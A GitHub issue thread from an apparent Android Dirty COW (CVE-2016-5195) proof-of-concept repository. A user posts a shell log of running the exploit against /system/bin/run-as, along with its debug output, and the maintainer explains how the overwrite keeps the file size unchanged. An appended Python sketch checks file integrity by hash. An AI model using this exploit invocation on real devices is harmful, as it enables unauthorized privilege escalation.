timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

Exploit does not overwrite destination file #59

Closed DrSchottky closed 7 years ago

DrSchottky commented 7 years ago

Tested on SM-G389F (Android 6.0.1, Kernel 3.10.9). Even if test.sh says that's vulnerable, it does not overwrite /system/bin/run-as

shell@xcover3velte:/data/local/tmp $ ./dirtycow run-as  /system/bin/run-as
dcow run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17920) differ

[*] size 17920
[*] mmap 0xb6d4c000
[*] currently 0xb6d4c000=464c457f
[*] using /proc/self/mem method
[*] madvise = 0xb6d4c000 17920
[*] /proc/self/mem 1863680 104
[*] madvise = 0 1658
[*] exploited 0 0xb6d4c000=464c457f
shell@xcover3velte:/data/local/tmp $ ls -l /system/bin/run-as
-rwxr-x--- root     shell       17920 2008-12-31 16:00 run-as

timwr commented 7 years ago

Have you tried running it? Its content may well have changed. The exploit is unable to change the file size of the target, so it's either padded with zeros or truncated.
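An added example, not part of the original thread or the project's code: because the target's size stays the same, `ls -l` cannot show whether its content changed, so an integrity check has to compare content against a known-good hash. The sketch below uses constructed stand-in bytes with the sizes from the log (17920 and 5544), both starting with the ELF magic that the log prints as `464c457f`; the function names are hypothetical, and the overwrite is simulated with an ordinary in-place write.

```python
import hashlib
import os
import tempfile


def expected_image(new_data: bytes, dest_size: int) -> bytes:
    """Content a same-size overwrite would leave behind: the new data
    truncated to dest_size, or padded with zeros up to dest_size."""
    return new_data[:dest_size].ljust(dest_size, b"\x00")


def classify(path: str, baseline_sha256: str, new_data: bytes) -> str:
    """Judge a file by its content, not by the size that ls -l reports."""
    with open(path, "rb") as fh:
        current = fh.read()
    if hashlib.sha256(current).hexdigest() == baseline_sha256:
        return "unchanged"
    if current == expected_image(new_data, len(current)):
        return "overwritten"
    return "modified-other"


def demo() -> dict:
    # Constructed stand-ins: only the sizes come from the issue's log.
    # Both start with \x7fELF, so comparing the first word tells nothing.
    original = b"\x7fELF" + b"A" * (17920 - 4)
    replacement = b"\x7fELF" + b"B" * (5544 - 4)
    baseline = hashlib.sha256(original).hexdigest()
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "run-as")
        with open(path, "wb") as fh:
            fh.write(original)
        size_before = os.stat(path).st_size
        results["before"] = classify(path, baseline, replacement)
        # Simulated same-size content change (ordinary write, assumption).
        with open(path, "r+b") as fh:
            fh.write(expected_image(replacement, size_before))
        results["after"] = classify(path, baseline, replacement)
        results["size_same"] = os.stat(path).st_size == size_before
    return results


if __name__ == "__main__":
    print(demo())
```

The baseline hash has to be taken from a trusted copy of the file, for example the same firmware image, before any comparison is meaningful.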